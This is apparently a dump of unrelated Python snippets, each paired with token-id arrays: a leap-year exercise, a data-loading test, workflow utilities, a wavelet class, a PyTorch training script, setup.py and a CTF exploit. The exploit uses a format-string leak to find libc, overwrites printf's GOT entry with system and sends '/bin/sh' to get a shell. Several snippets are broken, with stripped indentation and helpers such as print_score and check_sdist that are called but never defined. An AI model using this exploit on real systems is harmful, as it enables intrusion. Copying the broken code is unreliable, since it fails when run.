print('='*6, 'DESAFIO 032 - ANO BISSEXTO', '='*6)
ano = int(input('| Digite o ano que quer analisar ou digite 0 para analisar o ano atual: ')) #Recebe ano digitado
if ano == 0: #Se o valor digitado for 0 ele vai pegar o ano da data de hoje e colocar na variável ano
ano = date.today().year
if ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0: #Se o ano for divisível por 4 e por 400, ou quando dividido por 100 o resto é diferente de 0 então ele diz que o ano é bissexto, se não, diz que não é
print(f'O ano {ano} é BISSEXTO!')
else:
print(f'O ano {ano} não é BISSEXTO!')
| [
6738,
4818,
8079,
1330,
3128,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
20939,
64,
275,
29142,
313,
31047,
31215,
61... | 2.087324 | 355 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.bthe_b import bthe_b
def test_bthe_b():
"""Test module bthe_b.py by downloading
bthe_b.csv and testing shape of
extracted data has 100 rows and 8 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = bthe_b(test_path)
try:
assert x_train.shape == (100, 8)
except:
shutil.rmtree(test_path)
raise()
| [
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
6738,
11593,
37443,
834,
1330,
7297,
198,
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
198,
11748,
4423,
346,
198,
11748,
25064,
198,
11748,
20218,
7753,
198,
198,
6738,
13050,
... | 2.865169 | 178 |
from pwncli import *
cli_script()
p = gift['io']
e = gift['elf']
if gift['debug']:
libc = gift['libc']
else:
libc = ELF("/root/LibcSearcher/libc-database/other_libc_so/libc-2.23.so")
p.sendline("%41$p,%43$p")
msg = p.recvline()
code_addr, libc_addr = msg.split(b",")
code_base_addr = int16(code_addr.decode()) - e.sym['main'] - 74
libc_base_addr = int16(libc_addr.decode()) - libc.sym['__libc_start_main'] - 240
e.address = code_base_addr
libc.address = libc_base_addr
log_address("code_base_addr", code_base_addr)
payload = fmtstr_payload(offset=6, writes={e.got['printf']:libc.sym['system']}, write_size="short", write_size_max="short")
p.sendline(payload)
sleep(1)
p.sendline("/bin/sh")
p.interactive() | [
6738,
279,
675,
44506,
1330,
1635,
198,
198,
44506,
62,
12048,
3419,
198,
198,
79,
796,
6979,
17816,
952,
20520,
198,
68,
796,
6979,
17816,
7046,
20520,
198,
198,
361,
6979,
17816,
24442,
6,
5974,
198,
220,
220,
220,
9195,
66,
796,
... | 2.297468 | 316 |
###############################################################################
# Copyright (c) 2019, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory
# Written by the Merlin dev team, listed in the CONTRIBUTORS file.
# <merlin@llnl.gov>
#
# LLNL-CODE-797170
# All rights reserved.
# This file is part of Merlin, Version: 1.5.0.
#
# For details, see https://github.com/LLNL/merlin.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
###############################################################################
"""
This module contains a list of examples that can be used when learning to use
Merlin, or for setting up new workflows.
Examples are packaged in directories, with the directory name denoting
the example name. This must match the name of the merlin specification inside.
"""
import glob
import logging
import os
import shutil
import tabulate
import yaml
from merlin.examples import examples
LOG = logging.getLogger(__name__)
EXAMPLES_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), "workflows")
def write_example(src_path, dst_path):
"""
Write out the example workflow to a file.
:param src_path: The path to copy from.
:param content: The formatted content to write the file to.
"""
if os.path.isdir(src_path):
shutil.copytree(src_path, dst_path)
else:
shutil.copy(src_path, dst_path)
def list_examples():
"""List all available examples."""
headers = ["name", "description"]
rows = []
for example_dir in gather_example_dirs():
directory = os.path.join(os.path.join(EXAMPLES_DIR, example_dir), "")
specs = glob.glob(directory + "*.yaml")
for spec in specs:
with open(spec) as f:
try:
spec_metadata = yaml.safe_load(f)["description"]
except KeyError as e:
LOG.warn(f"{spec} lacks required section 'description'")
continue
except TypeError as e:
continue
rows.append([spec_metadata["name"], spec_metadata["description"]])
return "\n" + tabulate.tabulate(rows, headers) + "\n"
def setup_example(name, outdir):
"""Setup the given example."""
example = None
spec_paths = gather_all_examples()
for spec_path in spec_paths:
spec = os.path.basename(os.path.normpath(spec_path)).replace(".yaml", "")
if name == spec:
example = os.path.basename(os.path.dirname(spec_path))
break
if example is None:
LOG.error(f"Example '{name}' not found.")
return None
# if there is only 1 file in the example, don't bother making a directory for it
if len(os.listdir(os.path.dirname(spec_path))) == 1:
src_path = os.path.join(EXAMPLES_DIR, os.path.join(example, example + ".yaml"))
else:
src_path = os.path.join(EXAMPLES_DIR, example)
if outdir:
outdir = os.path.join(os.getcwd(), outdir)
else:
outdir = os.path.join(os.getcwd(), example)
if os.path.exists(outdir):
LOG.error(f"File '{outdir}' already exists!")
return None
if outdir is None:
outdir = os.getcwd()
LOG.info(f"Copying example '{name}' to {outdir}")
write_example(src_path, outdir)
return example
| [
29113,
29113,
7804,
4242,
21017,
198,
2,
15069,
357,
66,
8,
13130,
11,
13914,
45036,
3549,
2351,
4765,
11,
11419,
13,
198,
2,
21522,
771,
379,
262,
13914,
45036,
3549,
2351,
18643,
198,
2,
22503,
416,
262,
32918,
1614,
1074,
11,
5610,... | 2.768793 | 1,583 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from Commands.PythonCommandBase import PythonCommand, ImageProcPythonCommand
from Commands.Keys import KeyPress, Button, Direction, Stick, Hat | [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
6738,
49505,
13,
37906,
21575,
14881,
1330,
11361,
21575,
11,
7412,
2964,
66,
37906,
21575,
198,
6738,
49505,
... | 3.392857 | 56 |
from .signal import *
__all__ = ["orthogonal_wavelet", "DAUBECHIES_D4"]
class orthogonal_wavelet:
"""Orthogonal wavelet consisting of a scaling (low-pass) filter and a wavelet (high-pass) filter that together form a conjugate mirror filter (CMF) pair."""
@staticmethod
def from_scaling_filter(scaling_filter):
"""Construct orthogonal wavelet from scaling filter."""
# could also use scipy.signal.qmf() and translate manually
wavelet_filter = -scaling_filter.conj().modulate(-1.0).shift(-1).reverse()
return orthogonal_wavelet(scaling_filter, wavelet_filter)
@staticmethod
def from_wavelet_filter(wavelet_filter):
"""Construct orthogonal wavelet from wavelet filter."""
scaling_filter = -wavelet_filter.reverse().shift(1).modulate(-1.0).conj()
return orthogonal_wavelet(scaling_filter, wavelet_filter)
def analyze(self, s):
"""Decompose signal into scaling and wavelet coefficients."""
scaling = s.convolve(self.scaling_filter.reverse()).downsample()
wavelet = s.convolve(self.wavelet_filter.reverse()).downsample()
return (scaling, wavelet)
def reconstruct(self, scaling=None, wavelet=None):
"""Reconstruct signal from scaling and wavelet coefficients."""
if scaling is None:
scaling = signal()
if wavelet is None:
wavelet = signal()
return scaling.upsample().convolve(
self.scaling_filter
) + wavelet.upsample().convolve(self.wavelet_filter)
def scaling_function(self, L):
"""Return scaling function at dyadic approximation 2^{-L}."""
s = self._cascade(L, scaling=signal([1]))
return s.range * 2 ** -L, s.data * 2 ** (L / 2)
def wavelet_function(self, L):
"""Return wavelet function at dyadic approximation 2^{-L}."""
s = self._cascade(L, wavelet=signal([1]))
return s.range * 2 ** -L, s.data * 2 ** (L / 2)
def _cascade(self, L, wavelet=None, scaling=None):
"""
Starting from scaling and wavelet coefficients at level L, return output of inverse wavelet transform.
This is known as the cascade algorithm.
"""
# there is some numerical instability in scipy's implementation of the cascade algorithm (as compared to our code
# below and to Matlab's wavefun); otherwise we could simply use scipy.signal.cascade(self.scaling_filter.data, L)
s = self.reconstruct(scaling=scaling, wavelet=wavelet)
for l in range(L - 1):
s = self.reconstruct(scaling=s)
return s
DAUBECHIES_D4_SCALING_FILTER = signal(
[0.482_962_913_145, 0.836_516_303_738, 0.224_143_868_042, -0.129_409_522_551]
)
DAUBECHIES_D4 = orthogonal_wavelet.from_scaling_filter(DAUBECHIES_D4_SCALING_FILTER)
| [
6738,
764,
12683,
282,
1330,
1635,
198,
198,
834,
439,
834,
796,
14631,
1506,
519,
20996,
62,
19204,
1616,
1600,
366,
5631,
10526,
25994,
11015,
62,
35,
19,
8973,
628,
198,
4871,
29617,
519,
20996,
62,
19204,
1616,
25,
198,
220,
220,
... | 2.517889 | 1,118 |
import numpy as np
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
from torchvision import datasets, transforms, models
from torch.utils.data.sampler import SubsetRandomSampler
datadir = './data/train'
valid_size = .3
epochs = 3
steps = 0
running_loss = 0
print_every = 10
train_losses, test_losses = [], []
train_transforms = transforms.Compose([transforms.Resize(224),transforms.ToTensor()])
test_transforms = transforms.Compose([transforms.Resize(224), transforms.ToTensor()])
train_data = datasets.ImageFolder(datadir, transform=train_transforms)
test_data = datasets.ImageFolder(datadir, transform=test_transforms)
num_train = len(train_data)
indices = list(range(num_train))
split = int(np.floor(valid_size * num_train))
np.random.shuffle(indices)
train_idx, test_idx = indices[split:], indices[:split]
train_sampler = SubsetRandomSampler(train_idx)
test_sampler = SubsetRandomSampler(test_idx)
trainloader = torch.utils.data.DataLoader(train_data, sampler=train_sampler, batch_size=1)
testloader = torch.utils.data.DataLoader(test_data, sampler=test_sampler, batch_size=1)
print(trainloader.dataset.classes)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = models.resnet50(pretrained=True)
for param in model.parameters():
param.requires_grad = False
model.fc = nn.Sequential(nn.Linear(2048, 512), nn.ReLU(), nn.Dropout(0.2), nn.Linear(512, 10), nn.LogSoftmax(dim=1))
criterion = nn.NLLLoss()
optimizer = optim.Adam(model.fc.parameters(), lr=0.003)
model.to(device)
for epoch in range(epochs):
for inputs, labels in trainloader:
steps += 1
inputs, labels = inputs.to(device), labels.to(device)
optimizer.zero_grad()
logps = model.forward(inputs)
loss = criterion(logps, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
if steps % print_every == 0:
test_loss, accuracy = print_score(torch, testloader, inputs, device, model,criterion,labels)
running_loss = 0
model.train()
torch.save(model, 'saftey.pth')
| [
11748,
299,
32152,
355,
45941,
198,
11748,
28034,
198,
6738,
28034,
1330,
299,
77,
198,
6738,
28034,
1330,
6436,
198,
11748,
28034,
13,
20471,
13,
45124,
355,
376,
198,
6738,
28034,
10178,
1330,
40522,
11,
31408,
11,
4981,
198,
6738,
28... | 2.609964 | 823 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
import os
import sys
from os import path
from setuptools import find_packages, setup
from distutils.command.bdist import bdist
from distutils.command.sdist import sdist
version = '0.9.0.rc1'
cmdclass = dict()
cmdclass['bdist'] = check_bdist
cmdclass['sdist'] = check_sdist
try:
from wheel.bdist_wheel import bdist_wheel
except ImportError:
pass
cmdclass['bdist_wheel'] = check_bdist_wheel
if __name__ == "__main__":
setup(
name = 'msurrogate',
version = version,
url = 'https://github.com/mccullerlp/msurrogate',
author = 'Lee McCuller',
author_email = 'Lee.McCuller@gmail.com',
license = 'Apache v2',
description = (
'Interface With an out-of-process (possibly remote) python instance from Matlab'
),
packages=find_packages(
exclude=['docs'],
),
install_requires = [
'numpy',
'Pyro4',
],
cmdclass = cmdclass,
zip_safe = False,
keywords = ['Matlab', 'IPC', 'Pyro4',],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
6738,
11593,
37443,
834,
1330,
7297,
11,
3601,
62,
8818,
11,
28000,
1098,
62,
17201,
874,
198,
11748,
28686,
198,
11748... | 2.260341 | 822 |
import os
import sys
from stat import S_IREAD, S_IWRITE
from robot.api import logger
| [
11748,
28686,
198,
11748,
25064,
198,
6738,
1185,
1330,
311,
62,
40,
15675,
11,
311,
62,
40,
18564,
12709,
198,
198,
6738,
9379,
13,
15042,
1330,
49706,
628
] | 3.107143 | 28 |